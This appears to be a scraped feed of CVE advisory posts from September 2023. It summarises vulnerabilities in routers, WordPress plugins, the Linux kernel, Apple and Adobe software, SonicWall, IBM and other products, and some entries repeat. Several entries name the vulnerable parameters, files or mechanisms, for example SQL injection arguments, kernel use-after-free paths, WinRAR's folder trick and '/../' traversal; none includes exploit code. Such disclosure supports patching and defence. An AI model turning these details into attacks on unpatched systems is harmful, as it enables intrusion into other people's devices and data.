|
| 2023-09-11 14:58:20 |
🚨 CVE-2023-37284Improper authentication vulnerability in Archer C20 firmware versions prior to 'Archer C20(JP)_V1_230616' allows a network-adjacent unauthenticated attacker to execute an arbitrary OS command via a crafted request to bypass authentication.🎖@cveNotify |
|
| 2023-09-11 14:58:19 |
🚨 CVE-2023-39266A vulnerability in the ArubaOS-Switch web management interface could allow an unauthenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface provided certain configuration options are present. A successful exploit could allow an attacker to execute arbitrary script code in a victim's browser in the context of the affected interface.🎖@cveNotify |
|
| 2023-09-11 14:58:18 |
🚨 CVE-2023-32619Archer C50 firmware versions prior to 'Archer C50(JP)_V3_230505' and Archer C55 firmware versions prior to 'Archer C55(JP)_V1_230506' use hard-coded credentials to login to the affected device, which may allow a network-adjacent unauthenticated attacker to execute an arbitrary OS command.🎖@cveNotify |
|
| 2023-09-11 14:58:14 |
🚨 CVE-2023-4634The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3.09. This is due to insufficient controls on file paths being supplied to the 'mla_stream_file' parameter from the ~/includes/mla-stream-image.php file, where images are processed via Imagick(). This makes it possible for unauthenticated attackers to supply files via FTP that will make directory lists, local file inclusion, and remote code execution possible.🎖@cveNotify |
|
| 2023-09-11 14:58:13 |
🚨 CVE-2023-28538Memory corruption in WIN Product while invoking WinAcpi update driver in the UEFI region.🎖@cveNotify |
|
| 2023-09-11 14:58:12 |
🚨 CVE-2023-38574Open redirect vulnerability in VI Web Client prior to 7.9.6 allows a remote unauthenticated attacker to redirect users to arbitrary web sites and conduct phishing attacks via a specially crafted URL.🎖@cveNotify |
|
| 2023-09-11 12:58:17 |
🚨 CVE-2023-3612Govee Home app has unprotected access to WebView component which can be opened by any app on the device. By sending an URL to a specially crafted site, the attacker can execute JavaScript in context of WebView or steal sensitive user data by displaying phishing content. 🎖@cveNotify |
|
| 2023-09-11 10:58:14 |
🚨 CVE-2023-4816A vulnerability exists in the Equipment Tag Out authentication, when configured with Single Sign-On (SSO) with password validation in T214. This vulnerability can be exploited by an authenticated user per-forming an Equipment Tag Out holder action (Accept, Release, and Clear) for another user and entering an arbitrary password in the holder action confirmation dialog box. Despite entering an arbitrary password in the confirmation box, the system will execute the selected holder action.🎖@cveNotify |
|
| 2023-09-11 10:58:13 |
🚨 CVE-2023-40040An issue was discovered in the MyCrops HiGrade "THC Testing & Cannabi" application 1.0.337 for Android. A remote attacker can start the camera feed via the com.cordovaplugincamerapreview.CameraActivity component in some situations. NOTE: this is only exploitable on Android versions that lack runtime permission checks, and of those only Android SDK 5.1.1 API 22 is consistent with the manifest. Thus, this applies only to Android Lollipop, affecting less than five percent of Android devices as of 2023.🎖@cveNotify |
|
| 2023-09-11 05:58:33 |
🚨 CVE-2023-20900A malicious actor that has been granted Guest Operation Privileges https://docs.vmware.com/en/VMware-vSphere/8.0/vsphere-security/GUID-6A952214-0E5E-4CCF-9D2A-90948FF643EC.html in a target virtual machine may be able to elevate their privileges if that target virtual machine has been assigned a more privileged Guest Alias https://vdc-download.vmware.com/vmwb-repository/dcr-public/d1902b0e-d479-46bf-8ac9-cee0e31e8ec0/07ce8dbd-db48-4261-9b8f-c6d3ad8ba472/vim.vm.guest.AliasManager.html .🎖@cveNotify |
|
| 2023-09-11 05:58:32 |
🚨 CVE-2023-20867A fully compromised ESXi host can force VMware Tools to fail to authenticate host-to-guest operations, impacting the confidentiality and integrity of the guest virtual machine.🎖@cveNotify |
|
| 2023-09-10 20:58:27 |
🚨 CVE-2023-4851A vulnerability has been found in IBOS OA 4.5.5 and classified as critical. This vulnerability affects unknown code of the file ?r=dashboard/position/edit&op=member. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239260.🎖@cveNotify |
|
| 2023-09-10 20:58:26 |
🚨 CVE-2023-4852A vulnerability was found in IBOS OA 4.5.5 and classified as critical. This issue affects some unknown processing of the file ?r=dashboard/database/optimize. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-239261 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-09-10 20:58:23 |
🚨 CVE-2023-4848A vulnerability classified as critical was found in SourceCodester Simple Book Catalog App 1.0. Affected by this vulnerability is an unknown functionality of the file delete_book.php. The manipulation of the argument delete leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-239257 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-09-10 20:58:22 |
🚨 CVE-2023-4846A vulnerability was found in SourceCodester Simple Membership System 1.0. It has been rated as critical. This issue affects some unknown processing of the file delete_member.php. The manipulation of the argument mem_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-239255.🎖@cveNotify |
|
| 2023-09-10 20:58:21 |
🚨 CVE-2023-4847A vulnerability classified as problematic has been found in SourceCodester Simple Book Catalog App 1.0. Affected is an unknown function of the component Update Book Form. The manipulation of the argument book_title/book_author leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239256.🎖@cveNotify |
|
| 2023-09-10 20:58:18 |
🚨 CVE-2023-4838The Simple Download Counter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in versions up to, and including, 1.6 due to insufficient input sanitization and output escaping on user supplied attributes like 'before' and 'after'. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-10 20:58:17 |
🚨 CVE-2022-22409IBM Aspera Faspex 5.0.5 could allow a remote attacker to gather sensitive information about the web application, caused by an insecure configuration. IBM X-Force ID: 222592.🎖@cveNotify |
|
| 2023-09-10 20:58:16 |
🚨 CVE-2023-42276hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonArray.🎖@cveNotify |
|
| 2023-09-10 15:59:47 |
🚨 CVE-2023-4208A use-after-free vulnerability in the Linux kernel's net/sched: cls_u32 component can be exploited to achieve local privilege escalation.When u32_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.We recommend upgrading past commit 3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81.🎖@cveNotify |
|
| 2023-09-10 15:59:46 |
🚨 CVE-2023-4622A use-after-free vulnerability in the Linux kernel's af_unix component can be exploited to achieve local privilege escalation.The unix_stream_sendpage() function tries to add data to the last skb in the peer's recv queue without locking the queue. Thus there is a race where unix_stream_sendpage() could access an skb locklessly that is being released by garbage collection, resulting in use-after-free.We recommend upgrading past commit 790c2f9d15b594350ae9bca7b236f2b1859de02c.🎖@cveNotify |
|
| 2023-09-10 15:59:45 |
🚨 CVE-2023-4569A memory leak flaw was found in nft_set_catchall_flush in net/netfilter/nf_tables_api.c in the Linux Kernel. This issue may allow a local attacker to cause a double-deactivations of catchall elements, which results in a memory leak.🎖@cveNotify |
|
| 2023-09-10 15:59:44 |
🚨 CVE-2023-40283An issue was discovered in l2cap_sock_release in net/bluetooth/l2cap_sock.c in the Linux kernel before 6.4.10. There is a use-after-free because the children of an sk are mishandled.🎖@cveNotify |
|
| 2023-09-10 15:59:43 |
🚨 CVE-2023-4128A use-after-free flaw was found in net/sched/cls_fw.c in classifiers (cls_fw, cls_u32, and cls_route) in the Linux Kernel. This flaw allows a local attacker to perform a local privilege escalation due to incorrect handling of the existing filter, leading to a kernel information leak issue.🎖@cveNotify |
|
| 2023-09-10 15:59:39 |
🚨 CVE-2023-4273A flaw was found in the exFAT driver of the Linux kernel. The vulnerability exists in the implementation of the file name reconstruction function, which is responsible for reading file name entries from a directory index and merging file name parts belonging to one file into a single long file name. Since the file name characters are copied into a stack variable, a local privileged attacker could use this flaw to overflow the kernel stack.🎖@cveNotify |
|
| 2023-09-10 15:59:38 |
🚨 CVE-2023-4147A use-after-free flaw was found in the Linux kernel’s Netfilter functionality when adding a rule with NFTA_RULE_CHAIN_ID. This flaw allows a local user to crash or escalate their privileges on the system.🎖@cveNotify |
|
| 2023-09-10 15:59:37 |
🚨 CVE-2023-4194A flaw was found in the Linux kernel's TUN/TAP functionality. This issue could allow a local user to bypass network filters and gain unauthorized access to some resources. The original patches fixing CVE-2023-1076 are incorrect or incomplete. The problem is that the following upstream commits - a096ccca6e50 ("tun: tun_chr_open(): correctly initialize socket uid"), - 66b2c338adce ("tap: tap_open(): correctly initialize socket uid"), pass "inode->i_uid" to sock_init_data_uid() as the last parameter and that turns out to not be accurate.🎖@cveNotify |
|
| 2023-09-10 15:59:36 |
🚨 CVE-2023-4132A use-after-free vulnerability was found in the siano smsusb module in the Linux kernel. The bug occurs during device initialization when the siano device is plugged in. This flaw allows a local user to crash the system, causing a denial of service condition.🎖@cveNotify |
|
| 2023-09-10 15:59:35 |
🚨 CVE-2023-4004A use-after-free flaw was found in the Linux kernel's netfilter in the way a user triggers the nft_pipapo_remove function with the element, without a NFT_SET_EXT_KEY_END. This issue could allow a local user to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-09-10 15:59:31 |
🚨 CVE-2023-3863A use-after-free flaw was found in nfc_llcp_find_local in net/nfc/llcp_core.c in NFC in the Linux kernel. This flaw allows a local user with special privileges to impact a kernel information leak issue.🎖@cveNotify |
|
| 2023-09-10 15:59:30 |
🚨 CVE-2023-3776A use-after-free vulnerability in the Linux kernel's net/sched: cls_fw component can be exploited to achieve local privilege escalation.If tcf_change_indev() fails, fw_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.We recommend upgrading past commit 0323bce598eea038714f941ce2b22541c46d488f.🎖@cveNotify |
|
| 2023-09-10 15:59:29 |
🚨 CVE-2023-20588A division-by-zero error on some AMD processors can potentially return speculative data resulting in loss of confidentiality. 🎖@cveNotify |
|
| 2023-09-10 15:59:28 |
🚨 CVE-2023-3772A flaw was found in the Linux kernel’s IP framework for transforming packets (XFRM subsystem). This issue may allow a malicious user with CAP_NET_ADMIN privileges to directly dereference a NULL pointer in xfrm_update_ae_params(), leading to a possible kernel crash and denial of service.🎖@cveNotify |
|
| 2023-09-10 15:59:27 |
🚨 CVE-2023-3773A flaw was found in the Linux kernel’s IP framework for transforming packets (XFRM subsystem). This issue may allow a malicious user with CAP_NET_ADMIN privileges to cause a 4 byte out-of-bounds read of XFRMA_MTIMER_THRESH when parsing netlink attributes, leading to potential leakage of sensitive heap data to userspace.🎖@cveNotify |
|
| 2023-09-10 15:59:23 |
🚨 CVE-2023-2430A vulnerability was found due to missing lock for IOPOLL flaw in io_cqring_event_overflow() in io_uring.c in Linux Kernel. This flaw allows a local attacker with user privilege to trigger a Denial of Service threat.🎖@cveNotify |
|
| 2023-09-10 15:59:22 |
🚨 CVE-2023-3611An out-of-bounds write vulnerability in the Linux kernel's net/sched: sch_qfq component can be exploited to achieve local privilege escalation.The qfq_change_agg() function in net/sched/sch_qfq.c allows an out-of-bounds write because lmax is updated according to packet sizes without bounds checks.We recommend upgrading past commit 3e337087c3b5805fe0b8a46ba622a962880b5d64.🎖@cveNotify |
|
| 2023-09-10 15:59:21 |
🚨 CVE-2023-1206A hash collision flaw was found in the IPv6 connection lookup table in the Linux kernel’s IPv6 functionality when a user makes a new kind of SYN flood attack. A user located in the local network or with a high bandwidth connection can increase the CPU usage of the server that accepts IPV6 connections up to 95%.🎖@cveNotify |
|
| 2023-09-10 15:59:20 |
🚨 CVE-2023-2898There is a null-pointer-dereference flaw found in f2fs_write_end_io in fs/f2fs/data.c in the Linux kernel. This flaw allows a local privileged user to cause a denial of service problem.🎖@cveNotify |
|
| 2023-09-10 15:59:19 |
🚨 CVE-2023-1989A use-after-free flaw was found in btsdio_remove in drivers\bluetooth\btsdio.c in the Linux Kernel. In this flaw, a call to btsdio_remove with an unfinished job, may cause a race problem leading to a UAF on hdev devices.🎖@cveNotify |
|
| 2023-09-10 00:58:24 |
🚨 CVE-2023-4865A vulnerability has been found in SourceCodester Take-Note App 1.0 and classified as problematic. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-239350 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-09-10 00:58:20 |
🚨 CVE-2023-41915OpenPMIx PMIx before 4.2.6 and 5.0.x before 5.0.1 allows attackers to obtain ownership of arbitrary files via a race condition during execution of library code with UID 0.🎖@cveNotify |
|
| 2023-09-10 00:58:19 |
🚨 CVE-2023-40392A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Ventura 13.5. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2023-09-10 00:58:18 |
🚨 CVE-2023-29491ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.🎖@cveNotify |
|
| 2023-09-09 22:58:18 |
🚨 CVE-2022-38392Certain 5400 RPM hard drives, for laptops and other PCs in approximately 2005 and later, allow physically proximate attackers to cause a denial of service (device malfunction and system crash) via a resonant-frequency attack with the audio signal from the Rhythm Nation music video. A reported product is Seagate STDT4000100 763649053447.🎖@cveNotify |
|
| 2023-09-09 14:58:16 |
🚨 CVE-2023-4850A vulnerability, which was classified as critical, was found in IBOS OA 4.5.5. This affects an unknown part of the file ?r=dashboard/position/del. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-239259.🎖@cveNotify |
|
| 2023-09-09 14:58:15 |
🚨 CVE-2023-4851A vulnerability has been found in IBOS OA 4.5.5 and classified as critical. This vulnerability affects unknown code of the file ?r=dashboard/position/edit&op=member. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239260.🎖@cveNotify |
|
| 2023-09-09 12:58:15 |
🚨 CVE-2023-4848A vulnerability classified as critical was found in SourceCodester Simple Book Catalog App 1.0. Affected by this vulnerability is an unknown functionality of the file delete_book.php. The manipulation of the argument delete leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-239257 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-09-09 10:58:25 |
🚨 CVE-2023-4847A vulnerability classified as problematic has been found in SourceCodester Simple Book Catalog App 1.0. Affected is an unknown function of the component Update Book Form. The manipulation of the argument book_title/book_author leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239256.🎖@cveNotify |
|
| 2023-09-09 10:58:24 |
🚨 CVE-2023-4845A vulnerability was found in SourceCodester Simple Membership System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file account_edit_query.php. The manipulation of the argument admin_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-239254 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-09-09 06:58:38 |
🚨 CVE-2023-4487GE CIMPLICITY 2023 is by a process control vulnerability, which could allow a local attacker to insert malicious configuration files in the expected web server execution path to escalate privileges and gain full control of the HMI software.🎖@cveNotify |
|
| 2023-09-09 06:58:36 |
🚨 CVE-2023-30712Improper input validation in Settings Suggestions prior to SMR Sep-2023 Release 1 allows attackers to launch arbitrary activity.🎖@cveNotify |
|
| 2023-09-09 06:58:35 |
🚨 CVE-2023-30711Improper authentication in Phone and Messaging Storage SMR SEP-2023 Release 1 allows attacker to insert arbitrary data to the provider.🎖@cveNotify |
|
| 2023-09-09 06:58:34 |
🚨 CVE-2023-30715Improper access control vulnerability in Weather prior to SMR Sep-2023 Release 1 allows attackers to access location information set in Weather without permission.🎖@cveNotify |
|
| 2023-09-09 06:58:33 |
🚨 CVE-2023-34352A permissions issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Ventura 13.4, tvOS 16.5, iOS 16.5 and iPadOS 16.5, watchOS 9.5. An attacker may be able to leak user account emails.🎖@cveNotify |
|
| 2023-09-09 06:58:31 |
🚨 CVE-2023-32438This issue was addressed with improved checks to prevent unauthorized actions. This issue is fixed in tvOS 16.3, macOS Ventura 13.2, watchOS 9.3, iOS 16.3 and iPadOS 16.3. An app may be able to bypass Privacy preferences.🎖@cveNotify |
|
| 2023-09-09 06:58:30 |
🚨 CVE-2023-32432A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Ventura 13.4, tvOS 16.5, iOS 16.5 and iPadOS 16.5, watchOS 9.5. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2023-09-09 06:58:29 |
🚨 CVE-2023-32426A logic issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.3. An app may be able to gain root privileges.🎖@cveNotify |
|
| 2023-09-09 06:58:28 |
🚨 CVE-2023-32428This issue was addressed with improved file handling. This issue is fixed in macOS Ventura 13.4, tvOS 16.5, iOS 16.5 and iPadOS 16.5, watchOS 9.5. An app may be able to gain root privileges.🎖@cveNotify |
|
| 2023-09-09 06:58:27 |
🚨 CVE-2023-28209A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3. An app may be able to cause unexpected system termination or write kernel memory.🎖@cveNotify |
|
| 2023-09-09 06:58:26 |
🚨 CVE-2023-32425The issue was addressed with improved memory handling. This issue is fixed in iOS 16.5 and iPadOS 16.5, watchOS 9.5. An app may be able to gain elevated privileges.🎖@cveNotify |
|
| 2023-09-09 06:58:24 |
🚨 CVE-2023-28208A logic issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.2, iOS 16.3 and iPadOS 16.3. A user may send a text from a secondary eSIM despite configuring a contact to use a primary eSIM.🎖@cveNotify |
|
| 2023-09-09 06:58:23 |
🚨 CVE-2023-39365Cacti is an open source operational monitoring and fault management framework. Issues with Cacti Regular Expression validation combined with the external links feature can lead to limited SQL Injections and subsequent data leakage. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-09-09 06:58:22 |
🚨 CVE-2022-30639Adobe Illustrator versions 26.0.2 (and earlier) and 25.4.5 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-09 06:58:21 |
🚨 CVE-2022-30637Adobe Illustrator versions 26.0.2 (and earlier) and 25.4.5 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-09 06:58:20 |
🚨 CVE-2022-30638Adobe Illustrator versions 26.0.2 (and earlier) and 25.4.5 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-09 06:58:19 |
🚨 CVE-2022-30640Adobe Illustrator versions 26.0.2 (and earlier) and 25.4.5 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-09 06:58:18 |
🚨 CVE-2022-30642Adobe Illustrator versions 26.0.2 (and earlier) and 25.4.5 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-09 06:58:17 |
🚨 CVE-2022-30643Adobe Illustrator versions 26.0.2 (and earlier) and 25.4.5 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-09 06:58:16 |
🚨 CVE-2022-30644Adobe Illustrator versions 26.0.2 (and earlier) and 25.4.5 (and earlier) are affected by a Use-After-Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-09 00:58:57 |
🚨 CVE-2023-34723An issue was discovered in TechView LA-5570 Wireless Gateway 1.0.19_T53, allows attackers to gain sensitive information via /config/system.conf.🎖@cveNotify |
|
| 2023-09-09 00:58:55 |
🚨 CVE-2023-38831RARLabs WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the benign file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file. This was exploited in the wild in April through August 2023.🎖@cveNotify |
|
| 2023-09-09 00:58:52 |
🚨 CVE-2022-4953The Elementor Website Builder WordPress plugin before 3.5.5 does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.🎖@cveNotify |
|
| 2023-09-09 00:58:49 |
🚨 CVE-2023-35386Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-09-09 00:58:48 |
🚨 CVE-2023-38154Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-09-09 00:58:46 |
🚨 CVE-2023-34127Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in SonicWall GMS, SonicWall Analytics enables an authenticated attacker to execute arbitrary code with root privileges. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.🎖@cveNotify |
|
| 2023-09-09 00:58:43 |
🚨 CVE-2023-34132Use of password hash instead of password for authentication vulnerability in SonicWall GMS and Analytics allows Pass-the-Hash attacks. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.🎖@cveNotify |
|
| 2023-09-09 00:58:41 |
🚨 CVE-2023-34124The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.🎖@cveNotify |
|
| 2023-09-09 00:58:38 |
🚨 CVE-2023-34133Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in SonicWall GMS and Analytics allows an unauthenticated attacker to extract sensitive information from the application database. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.🎖@cveNotify |
|
| 2023-09-09 00:58:36 |
🚨 CVE-2023-36812OpenTSDB is a open source, distributed, scalable Time Series Database (TSDB). OpenTSDB is vulnerable to Remote Code Execution vulnerability by writing user-controlled input to Gnuplot configuration file and running Gnuplot with the generated configuration. This issue has been patched in commit `07c4641471c` and further refined in commit `fa88d3e4b`. These patches are available in the `2.4.2` release. Users are advised to upgrade. User unable to upgrade may disable Gunuplot via the config option`tsd.core.enable_ui = true` and remove the shell files `mygnuplot.bat` and `mygnuplot.sh`.🎖@cveNotify |
|
| 2023-09-09 00:58:35 |
🚨 CVE-2023-25826Due to insufficient validation of parameters passed to the legacy HTTP query API, it is possible to inject crafted OS commands into multiple parameters and execute malicious code on the OpenTSDB host system. This exploit exists due to an incomplete fix that was made when this vulnerability was previously disclosed as CVE-2020-35476. Regex validation that was implemented to restrict allowed input to the query API does not work as intended, allowing crafted commands to bypass validation.🎖@cveNotify |
|
| 2023-09-09 00:58:33 |
🚨 CVE-2022-31470An XSS vulnerability in the index_mobile_changepass.hsp reset-password section of Axigen Mobile WebMail before 10.2.3.12 and 10.3.x before 10.3.3.47 allows attackers to run arbitrary Javascript code that, using an active end-user session (for a logged-in user), can access and retrieve mailbox content.🎖@cveNotify |
|
| 2023-09-09 00:58:32 |
🚨 CVE-2019-7609Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.🎖@cveNotify |
|
| 2023-09-09 00:58:30 |
🚨 CVE-2023-33016Transient DOS in WLAN firmware while parsing MLO (multi-link operation).🎖@cveNotify |
|
| 2023-09-09 00:58:28 |
🚨 CVE-2023-33019Transient DOS in WLAN Host while doing channel switch announcement (CSA), when a mobile station receives invalid channel in CSA IE.🎖@cveNotify |
|
| 2023-09-09 00:58:25 |
🚨 CVE-2022-22402IBM Aspera Faspex 5.0.5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 222571.🎖@cveNotify |
|
| 2023-09-09 00:58:24 |
🚨 CVE-2022-22409IBM Aspera Faspex 5.0.5 could allow a remote attacker to gather sensitive information about the web application, caused by an insecure configuration. IBM X-Force ID: 222592.🎖@cveNotify |
|
| 2023-09-09 00:58:22 |
🚨 CVE-2023-40306SAP S/4HANA Manage Catalog Items and Cross-Catalog searches Fiori apps allow an attacker to redirect users to a malicious site due to insufficient URL validation. As a result, it may have a slight impact on confidentiality and integrity.🎖@cveNotify |
|
| 2023-09-09 00:58:19 |
🚨 CVE-2023-42276hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonArray.🎖@cveNotify |
|
| 2023-09-09 00:58:17 |
🚨 CVE-2023-42277hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonObject.putByPath.🎖@cveNotify |
|
| 2023-09-08 22:58:28 |
🚨 CVE-2022-22405IBM Aspera Faspex 5.0.5 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 222576.🎖@cveNotify |
|
| 2023-09-08 22:58:27 |
🚨 CVE-2023-24965IBM Aspera Faspex 5.0.5 does not restrict or incorrectly restricts access to a resource from an unauthorized actor. IBM X-Force ID: 246713.🎖@cveNotify |
|
| 2023-09-08 22:58:26 |
🚨 CVE-2023-30995IBM Aspera Faspex 5.0.5 could allow a malicious actor to bypass IP whitelist restrictions using a specially crafted HTTP request. IBM X-Force ID: 254268.🎖@cveNotify |
|
| 2023-09-08 22:58:25 |
🚨 CVE-2023-4809In pf packet processing with a 'scrub fragment reassemble' rule, a packet containing multiple IPv6 fragment headers would be reassembled, and then immediately processed. That is, a packet with multiple fragment extension headers would not be recognized as the correct ultimate payload. Instead a packet with multiple IPv6 fragment headers would unexpectedly be interpreted as a fragmented packet, rather than as whatever the real payload is.As a result, IPv6 fragments may bypass pf firewall rules written on the assumption all fragments have been reassembled and, as a result, be forwarded or processed by the host.🎖@cveNotify |
|
| 2023-09-08 22:58:24 |
🚨 CVE-2022-33164IBM Security Directory Server 7.2.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view or write to arbitrary files on the system. IBM X-Force ID: 228579.🎖@cveNotify |
|
| 2023-09-08 22:58:23 |
🚨 CVE-2023-32332IBM Maximo Application Suite 8.9, 8.10 and IBM Maximo Asset Management 7.6.1.2, 7.6.1.3 are vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site. IBM X-Force ID: 255072.🎖@cveNotify |
|
| 2023-09-08 22:58:22 |
🚨 CVE-2023-41318matrix-media-repo is a highly customizable multi-domain media repository for the Matrix chat ecosystem. In affected versions an attacker could upload a malicious piece of media to the media repo, which would then be served with `Content-Disposition: inline` upon download. This vulnerability could be leveraged to execute scripts embedded in SVG content. Commits `77ec235` and `bf8abdd` fix the issue and are included in the 1.3.0 release. Operators should upgrade to v1.3.0 as soon as possible. Operators unable to upgrade should override the `Content-Disposition` header returned by matrix-media-repo as a workaround.🎖@cveNotify |
|
| 2023-09-08 22:58:21 |
🚨 CVE-2023-4369Insufficient data validation in Systems Extensions in Google Chrome on ChromeOS prior to 116.0.5845.120 allowed an attacker who convinced a user to install a malicious extension to bypass file restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-09-08 21:58:24 |
🚨 CVE-2023-31132Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a privilege escalation vulnerability. A low-privileged OS user with access to a Windows host where Cacti is installed can create arbitrary PHP files in a web document directory. The user can then execute the PHP files under the security context of SYSTEM. This allows an attacker to escalate privilege from a normal user account to SYSTEM. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-09-08 21:58:21 |
🚨 CVE-2023-21663Memory Corruption while accessing metadata in Display.🎖@cveNotify |
|
| 2023-09-08 18:58:25 |
🚨 CVE-2023-34317An improper input validation vulnerability exists in the OAS Engine User Creation functionality of Open Automation Software OAS Platform v18.00.0072. A specially crafted series of network requests can lead to unexpected data in the configuration. An attacker can send a sequence of requests to trigger this vulnerability.🎖@cveNotify |
|
| 2023-09-08 18:58:24 |
🚨 CVE-2023-34353An authentication bypass vulnerability exists in the OAS Engine authentication functionality of Open Automation Software OAS Platform v18.00.0072. A specially crafted network sniffing can lead to decryption of sensitive information. An attacker can sniff network traffic to trigger this vulnerability.🎖@cveNotify |
|
| 2023-09-08 18:58:23 |
🚨 CVE-2023-34994An improper resource allocation vulnerability exists in the OAS Engine configuration management functionality of Open Automation Software OAS Platform v18.00.0072. A specially crafted series of network requests can lead to creation of an arbitrary directory. An attacker can send a sequence of requests to trigger this vulnerability.🎖@cveNotify |
|
| 2023-09-08 18:58:19 |
